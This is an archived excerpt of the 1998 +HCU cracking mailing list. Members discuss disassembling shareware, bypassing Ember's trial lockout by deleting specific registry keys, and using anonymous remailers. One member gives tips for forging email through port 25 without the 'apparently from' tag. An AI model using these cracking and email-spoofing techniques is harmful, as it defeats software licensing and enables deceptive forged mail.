would be VERY interresting.....
Thanks for all your hard work.
+tc
-----#3-------------------------------------------------
Subject: help on disassembling file
Hi All
I am working on a demo which as several menu options disabled.
However using BRW 4.5 I saw that the menus are all initially
enabled.
I tried to bpx on enablemenuitem to see what I could find but
I was stuck inside MFC calls all the time.
Now comes my real problem:
When I tried to use wdasm89 on it the prog replied saying that the
file does not have a win95 header nor the other type headers like
PE, NE or 16 bit header. To disassemble I need to give the right
file offset to begin disassembling the file. How do I find it?
The demo docs says the program runs in win95 or win3.11 with
win32s. Maybe this is the problem.
I tried to find something using QuickView but maybe I don't know where
to look.
Any hints appreciated.
PopJack
______________________________________________________
Get Your Private, Free Email at **********************
-----#4-------------------------------------------------
Subject: smtp question - maybe i missed something (+gthorne)
i know it is rare for me to ask much - but i have a question that i
noticed in the past and never really checked out - but heck maybe one of
you have run across a solution (other than just putting a fake return
address in netscape or using a remailer)
when using telnet (host) at port 25 to send email,
often, servers will put a message on your emails when you send them...
'apparently from...'
which is clearly the mark of a spoofed message
has anyone heard of a way to keep it from doing this?
or is it as i suspect that you just need a different server...
if this is a simple solution that i just overlooked no problem :)
when i taught myself C way back when i missed some important small bits
that i learned after working with data structures, kinda like learning
division before addition...
(such is often the case with self teaching)
thanks in advance and take care all
+gthorne
-----#5-------------------------------------------------
Subject: Re: Stuck with Everlock
forwarded pupil
(fravia+)
-------------Forwarded Message-----------------
From: Clark1d, ************************
To: , 100114,453
Date: 15-01-98 5:17
RE: Re: Stuck with Everlock
Sender: ***************
Received: from imo11.mx.aol.com (imo11.mx.aol.com [198.81.19.165])
by arl-img-1.compuserve.com (8.8.6/8.8.6/2.10) with ESMTP id XAA09146
for **************************** Wed, 14 Jan 1998 23:16:55 -0500 (EST)
From: Clark1d *****************
Message-ID: ***************************
Date: Wed, 14 Jan 1998 22:53:52 EST
To: *************************
Subject: Re: Stuck with Everlock
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7bit
Organization: AOL ********************
X-Mailer: Inet_Mail_Out (IMOv11)
Fravia - I really appreciate the response (and the encouragement). In many of
+Orc's essays, he mentioned that a newbie such as me should pair up with a vet
for help and hints. Do you know if any of the students would like to
volunteer. I am sure everyone is rather busy, so I would try to not take much
of their time. I believe that a little help early on will really give me a
jumpstart.
Also, I have obtained a great deal of information about assembly programming
and I am ingesting it as fast as I can.
Thanks
David
-----#6-------------------------------------------------
Subject: Anonymous Remailers
>(this tricks are only for SENDING mail, since receiving is not that
>much a problem)
Really? I find it the other way around. Safely receiving mail can be a real
headache and quite inconvenient when using nymservers.
>Note: Attention, you're NOT 100%ly untraceable, since some Wingates log
>such activity. (most do not, though).
Yes. You should use anonymous remailers. I use ******************* for my
Ghiribizzo persona. It's only a type I remailer as this persona is only low
security but you can use type II (mixmaster) remailers if you need higher
security. You can get a list from the internet somewhere (do search
+remailer +anonymous).
Almost all are run by people who believe in privacy and are therefore not
logged. A lot also support PGP encryption and other tricks.
>You can send email by telnetting to a mailserver to
>port 25 (telnet victim.com 25) and then using the SMTP commands.
You can also telnet to POP3 servers to collect mail. Commands are:
USER username
PASS password
RETR # retrieve message number #
DELE # delete message number #
QUIT
There are others (look for RFC) but these should get you through. I telnet
directly as I use some computers which have only telnet and netscape loaded
and netscape takes an eternity to load via network.
~~
Ghiribizzo
=====End of Issue 117===================================
========================================================
+HCU Maillist Issue: 118 01/17/1998
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
Web Repository.........................hcuml.home.ml.org
========================================================
CONTENTS:
#1 Subject: ourprot.zip
#2 Subject: Ember
ARTICLES:
-----#1-------------------------------------------------
Subject: ourprot.zip
Did anyone download ourprot.zip? Mine wasn't complete and when I tried to
finish the d/l on my next session, I found that it had been removed
(possibly because Quine had cracked the 'heavy' protection?). Was the zip
useful? If so, could you please send a copy to me via email.
The trouble with the net is that everything seems to have such a short
lifespan. I remember trying to find OLDER versions of W32Dasm to have a
look at and all the FTP sites seem to be up to date and don't keep older
versions. Tip: use web sites which are updated infrequently. I tried one of
Fravia's mirrors but the last update was in November!
~~
Ghiribizzo
-----#2-------------------------------------------------
Subject: Ember
As coincidence may have it I was messing around with Ember also.
I thought that it was a very interesting reaction to failed crack attemps.
After the first lock out if you uninstall and reinstall it, you will be
able to access
it but the trial period will be expired. If you continue fail to crack it
again it will
go itno what it calls "Self-Defense" Mode and won't even enter the program.
I find it kinda interesting that it says the policy for registering it
after this happens is
"No Questions Asked". If you try to unistall/reinstall now it won't let you
in. I tried
for a bit to figure out how it checked for Self-Defense mode using File
Monitor and Reg Monitor but didn't see anything that looked suspicious.
This was going to be my first crack but I think I may be in over my head.
Any suggestions on how the program may detect that it's in Self-Defense
mode after reintsalling?
Joe Dark
=====End of Issue 118===================================
========================================================
+HCU Maillist Issue: 119 01/18/1998
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
Web Repository.........................hcuml.home.ml.org
========================================================
CONTENTS:
#1 Subject: firehand
#2 Subject: ember
#3 Subject: finding program entry points
#4 Subject: smtp port 25
#5 Subject: none
ARTICLES:
-----#1-------------------------------------------------
Subject: firehand
I haven't seen a protection that threatens to wipe your HD before. My
initial feelings is that it is a bluff, but I think the legality of such an
action may be more interesting than it's implementation.
~~
Ghiribizzo
-----#2-------------------------------------------------
Subject: ember
it isn't so hard
just delete the HKLM/software/microsoft/windows/msofc
& HKLM/software/fireworx/ember/ key & user entries
from the registry
i don't think it really deletes stuff btw.
+SNiKkEL
-----#3-------------------------------------------------
Subject: finding program entry points
i.e. press F4, F3, F8.
~~
-----#4-------------------------------------------------
Subject: smtp port 25
The 'apparently from..' tag gets added when the SMTP is not adhered to.
Usually due to forgetting the 'from' bit of the header or (easier to
forget) the HELO part of the protocol.
If you're writing a program to spoof mail automatically, you'll need to put
in some checking for 'mis-sent' commands. For some reason, however, the
first command usually is not received properly - this corresponds (usually)
to the HELO command. I suspect this is why you are getting the 'apparently
from' tags.
I'm writing this from memory as it has been several years since I spoofed
email. There are probably some FAQs on the net somewhere (I wrote one in a
previous persona - it may still be kicking around).
I hope this helps. If you still can't get it to work, please email me and
I'll look into it as I have definitely sent fake mail which didn't have the
tags.
~~
Ghiribizzo
-----#5-------------------------------------------------
Subject: none
Friends:
Most of you are aware that I solved the +ORC riddle
a few months ago. We've all been waiting for Basilisk
to post the story on his web pages, but he's been very
busy with his work, and hasn't had the time to complete
his writings.
While we were waiting on the Basilisk, it seems our
+teacher has decided to change the rules at the end of
the game. Now, we must also become hackers if we are
going to see the solution to +his riddle.
The riddle points to a particular server, once you
locate that server, you must find a web page ("gate")
on it. Actualy, there are TWO web pages ("gates"), and
I located both of them, but you only have to find one
of them to continue to +Orcs web-site.
Once you've located the "gate(s)", you find the
+ORC link on the web page, and click it, to get to
another server. But you're not at +Orcs web page yet, so
you must search this second server to finaly find +his
web pages.
Some of you were lucky enough to view these "gates",
because I've told a few people where they were, and I'm
sure the Basilisk has also, but for those of you who
were not that lucky, it's time to brush up on your
hacking skills.
For some reason, BOTH of the "gates" have been
re-named, and now you'll need a login/password to view
them. Since I'm not a hacker, I don't know if they
still contain the link to the geocities server, but
maybe if you ever hack your way in, you'll let me know.
As you'll learn, when the Basilisk gets the story
posted on his web site, I've known about these "gates"
for a year and a half. I've visited them often, because
they contain a wealth of information. They were designed
for hackers and crackers, and there was no need to
re-name them, or block access, because they are
legendary on the net. I did not tell anyone about them
because I thought that +Orcs web site was the treasure
to be found, not the "gates".
Perhaps +he did this for security reasons, or maybe
this is his way of telling us the final solution to the
riddle HAS been found, since he never realy came right
out and said so, who knows?
Whatever the reason, my time is too limited to play
this game when the rules change mid-stream. Anyone
wishing to continue this game can contact me for any
information I have, except for +his real name, e-mail
address, real address, and picture.
You'll have to "prove" that you're actualy working
on the riddle by telling me what you've found, I don't
want to "give" the information to lamers so they can
take credit for my hard work. The rest will be up to
you, until the rules change again.
Hackmore Readrite
Data Miners Inc.
=====End of Issue 119===================================
========================================================
+HCU Maillist Issue: 120 01/19/1998
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
Web Repository.........................hcuml.home.ml.org
========================================================
CONTENTS:
#1 Subject: Hcu Repository
#2 Subject: Assembly
ARTICLES:
-----#1-------------------------------------------------
Subject: Hcu Repository
Hi Everyone..
I have been using a JDK 1.1 patched version of Netscape for a while now,
and the HCU test search applet was tested using that.
I recently went to the applet page using a JDK 1.0 browser, only to find it
didn't work...
If someone had told me sooner, I could have made the fix in a few
seconds.(Only needed to change a couple of lines)
I can only assume
1) No-one cares
2) No one checked the page
3) Every one assumes I am a terrible programmer :(
Anyway, it works now.(Tested with Netscape 4)
The link is:
***************************************************
Please send comments, EVEN IF IT DOESN'T WORK!
+Alt-F4
-----#2-------------------------------------------------
Subject: Assembly
I'm still learning assembly and there is something that I'm not
sure of. The TEST command. It compares two things bit by
bit and sets Z to 1 if it's the same right? I see this line in programs
all the time,
TEST AL, AL
and sometimes Z = 1 and sometimes not. Can someone explain this
to me?
Joe Dark
=====End of Issue 120===================================